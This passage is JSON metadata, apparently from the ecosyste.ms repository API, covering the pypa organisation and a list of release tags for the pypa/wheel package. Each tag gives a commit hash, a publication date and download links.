America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r